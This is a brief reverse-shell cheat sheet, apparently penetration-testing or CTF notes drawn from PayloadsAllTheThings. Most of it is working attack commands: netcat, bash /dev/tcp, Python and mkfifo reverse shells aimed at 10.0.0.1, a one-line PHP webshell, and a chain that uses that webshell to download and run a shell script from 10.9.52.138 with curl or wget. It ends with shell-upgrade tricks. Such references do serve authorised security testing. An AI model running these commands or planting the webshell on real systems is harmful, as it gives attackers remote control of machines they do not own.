Reverse shell
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
Well-known reverse shells
# Listener
nc -lnvp 1234
# netcat
nc -e /bin/bash 10.0.0.1 1234
# bash
bash -i >& /dev/tcp/10.0.0.1/1234 0>&1
# python
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
# netcat (openbsd)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
# php webshell
<?php echo "<pre>" . system($_REQUEST["cmd"]) . "</pre>"; ?>
$ echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.0.0.1/1234 0>&1' > shell.sh
$ python3 -m http.server 8000
?cmd=curl+10.9.52.138:8000/shell.sh+-o+/tmp/shell.sh
or
?cmd=wget+10.9.52.138:8000/shell.sh+-O+/tmp/shell.sh
$ nc -lvnp 1234
?cmd=bash+/tmp/shell.sh
Interactive shell (upgrade your shell)
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
# Particularly useful with Windows shells (to use up/down arrows)
rlwrap nc -lvnp <port>
# On our computer
$ stty -a
speed 38400 baud; rows 17; columns 240; line = 0;
[...]
# On the reverse shell
stty rows 17
stty cols 240